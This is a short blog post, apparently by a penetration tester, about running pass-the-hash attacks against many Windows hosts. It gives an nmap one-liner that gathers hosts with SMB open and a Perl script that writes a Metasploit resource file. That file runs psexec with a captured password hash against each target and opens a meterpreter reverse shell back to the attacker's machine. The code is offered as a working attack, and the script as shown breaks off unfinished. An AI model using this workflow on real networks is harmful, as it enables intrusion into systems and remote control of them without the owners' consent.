So, I got some pretty harsh feedback from my first blog post. "You really suck at scripting", they said. "You're a script-kiddie's script-kiddie!", they yelled. "What if I wanted to pass a list of IPs, smart boy? How would you do that?" I tried not to get defensive and replied, "Jeez Mom, relax, I'll come up a solution."
I've been using a perl script that lets me pass-the-hash against all IPs in a subnet range but I updated it to set the rhosts from a file instead. That way once I get a hash I want to try, I can nmap the environment and collect targets with just SMB ports to pass to the attack.
Start by pulling together the targets using nmap and the unix cut command:
nmap -p445 -Pn 192.168.1.1/24 -oG - | grep 445/open | cut -d' ' -f2 >> smb.txt
Then create the perl file that can be compiled into an MSF resource file.
#!/usr/bin/perl -w
use strict;
my $input_file="smb.txt";
print "use windows/smb/psexec\n";
print "set SMBUser NAME\n";
print "set SMBPass HASH\n";
print "set PAYLOAD windows/meterpreter/reverse_tcp\n";
print "set LHOST XXX.XXX.XXX.XXX\n";
print "set LPORT 4444\n";
open(IN, $input_file) or die "$input_file\n";
while(<IN>) {
chomp;
print "set RHOST $_\n";
print "exploit\n";
print "sleep 2\n";
No comments:
Post a Comment
Thanks for adding to the conversation. I'll update your post shortly.